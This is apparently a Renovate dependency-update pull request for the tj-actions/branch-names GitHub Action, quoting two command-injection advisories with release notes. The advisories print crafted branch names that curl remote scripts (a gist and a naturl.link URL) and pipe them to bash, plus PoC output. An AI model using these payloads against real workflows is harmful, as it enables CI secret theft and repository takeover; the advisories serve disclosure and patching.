chore(deps): update tj-actions/branch-names action to v9 [security]

[renovate]

This PR contains the following updates:

Package	Type	Update	Change
tj-actions/branch-names	action	major	v6 → v9

GitHub Vulnerability Alerts

CVE-2023-49291

Summary

The tj-actions/branch-names GitHub Actions references the github.event.pull_request.head.ref and github.head_ref context variables within a GitHub Actions run step. The head ref variable is the branch name and can be used to execute arbitrary code using a specially crafted branch name.

Details

The vulnerable code is within the action.yml file the run step references the value directly, instead of a sanitized variable.

runs:
  using: "composite"
  steps:
    - id: branch
      run: |
        # "Set branch names..."
        if [[ "${{ github.ref }}" != "refs/tags/"* ]]; then
          BASE_REF=$(printf "%q" "${{ github.event.pull_request.base.ref || github.base_ref }}")
          HEAD_REF=$(printf "%q" "${{ github.event.pull_request.head.ref || github.head_ref }}")
          REF=$(printf "%q" "${{ github.ref }}")

An attacker can use a branch name to inject arbitrary code, for example: Test")${IFS}&&${IFS}{curl,-sSfL,gist.githubusercontent.com/RampagingSloth/72511291630c7f95f0d8ffabb3c80fbf/raw/inject.sh}${IFS}|${IFS}bash&&echo${IFS}$("foo will download and run a script from a Gist. This allows an attacker to inject a payload of arbitrary complexity.

Impact

An attacker can use this vulnerability to steal secrets from or abuse GITHUB_TOKEN permissions.

Reference

• https://securitylab.github.com/research/github-actions-untrusted-input

CVE-2025-54416

Overview

A critical vulnerability has been identified in the tj-actions/branch-names GitHub Action workflow which allows arbitrary command execution in downstream workflows. This issue arises due to inconsistent input sanitization and unescaped output, enabling malicious actors to exploit specially crafted branch names or tags. While internal sanitization mechanisms have been implemented, the action outputs remain vulnerable, exposing consuming workflows to significant security risks.

Technical Details

The vulnerability stems from the unsafe use of the eval printf "%s" pattern within the action's codebase. Although initial sanitization using printf "%q" properly escapes untrusted input, subsequent unescaping via eval printf "%s" reintroduces command injection risks. This unsafe pattern is demonstrated in the following code snippet:

echo "base_ref_branch=$(eval printf "%s" "$BASE_REF")" >> "$GITHUB_OUTPUT"
echo "head_ref_branch=$(eval printf "%s" "$HEAD_REF")" >> "$GITHUB_OUTPUT"
echo "ref_branch=$(eval printf "%s" "$REF_BRANCH")" >> "$GITHUB_OUTPUT"

This approach allows attackers to inject arbitrary commands into workflows consuming these outputs, as shown in the Proof-of-Concept (PoC) below.

Proof-of-Concept (PoC)

1. Create a branch with the name $(curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash).
2. Trigger the vulnerable workflow by opening a pull request into the target repository.
3. Observe arbitrary code execution in the workflow logs.

Example output:

Running on a pull request branch.
Run echo "Running on pr: $({curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash)"
  echo "Running on pr: $({curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash)"
  shell: /usr/bin/bash -e {0}
Running on pr: === PoC script executed successfully ===
Runner user: runner

Impact

This vulnerability enables arbitrary command execution in repositories consuming outputs from tj-actions/branch-names. The severity of the impact depends on the permissions granted to the GITHUB_TOKEN and the context of the triggering event. Potential consequences include:

• Theft of sensitive secrets stored in the repository.
• Unauthorized write access to the repository.
• Compromise of the repository's integrity and security.

Mitigation and Resolution

To address this vulnerability, the unsafe eval printf "%s" pattern must be replaced with safer alternatives. Specifically, direct printf calls can achieve the same functionality without unescaping shell-unsafe characters. Below is the recommended fix:

printf "base_ref_branch=%s\n" "$BASE_REF" >> "$GITHUB_OUTPUT"
printf "head_ref_branch=%s\n" "$HEAD_REF" >> "$GITHUB_OUTPUT"
printf "ref_branch=%s\n" "$REF_BRANCH" >> "$GITHUB_OUTPUT"
printf "tag=%s\n" "$TAG" >> "$GITHUB_OUTPUT"

This approach ensures that all outputs remain properly escaped and safe for downstream consumption.

Recommendations

1. Immediate Action: Developers using the tj-actions/branch-names workflow should update their workflows to latest major version v9.

References

• GitHub Actions Security Guide
• How to Secure GitHub Actions Workflows
• Related Vulnerability: GHSA-mcph-m25j-8j63
• Template Injection Advisory: GHSA-8v8w-v8xg-79rf

---

Release Notes

tj-actions/branch-names (tj-actions/branch-names)

v9

Compare Source

🔄 Update

• Update update-readme.yml (5250492) - (Tonye Jack)
• Update update-readme.yml (a2bc495) - (Tonye Jack)
• Update README.md (169ddc1) - (Tonye Jack)
• Update README.md (4d35052) - (Tonye Jack)
• Updated README.md (#​423)

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (6be34a8) - (github-actions[bot])

⬆️ Upgrades

• Upgraded from v9.0.0 -> v9.0.1 (#​424)

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (c0714e7) - (github-actions[bot])

v8

Compare Source

🔄 Update

• Updated README.md (#​419)

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (f904073) - (github-actions[bot])

⚙️ Miscellaneous Tasks

• Update action.yml (#​418) (c817961) - (Tonye Jack)

🛡️ Security

• Fix unsafe outputs (#​420) (e497ceb) - (Tonye Jack)

⬆️ Upgrades

• Upgraded from v8.2.0 -> v8.2.1 (#​417)

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (46ae71d) - (github-actions[bot])

v7

Compare Source

📦 Bumps

• Bump peter-evans/create-pull-request from 5 to 6

Bumps peter-evans/create-pull-request from 5 to 6.

• Release notes
• Commits

---

updated-dependencies:

• dependency-name: peter-evans/create-pull-request
  dependency-type: direct:production
  update-type: version-update:semver-major
  ...

Signed-off-by: dependabot[bot] support@github.com (d7e1c12) - (dependabot[bot])

🔄 Update

• Updated README.md (331c645) - (jackton1)
• Update README.md (1dd881b) - (Tonye Jack)
• Update README.md (df61b49) - (Tonye Jack)

📝 Other

• PR #​282: update test.yml (6871f53) - (repo-ranger[bot])
• PR #​281: update tj-actions/verify-changed-files action to v18 (b08a65c) - (repo-ranger[bot])
• PR #​279: peter-evans/create-pull-request from 5 to 6 (daaa308) - (repo-ranger[bot])
• PR #​278: README.md (e6d7f60) - (repo-ranger[bot])
• PR #​277: update tj-actions/verify-changed-files action to v17 (6a42993) - (repo-ranger[bot])
• PR #​276: update github/codeql-action action to v3 (3480893) - (repo-ranger[bot])
• PR #​275: to v8 (ce11ce0) - (repo-ranger[bot])

⚙️ Miscellaneous Tasks

• Update test.yml (fd631fd) - (Tonye Jack)
• deps: Update tj-actions/verify-changed-files action to v18 (7a67835) - (renovate[bot])
• deps: Update tj-actions/verify-changed-files action to v17 (2fc8b99) - (renovate[bot])
• deps: Update github/codeql-action action to v3 (133b286) - (renovate[bot])

⬆️ Upgrades

• Upgraded from v7.0.7 -> v8 (cf62a9f) - (jackton1)

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[sonarqubecloud]

Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud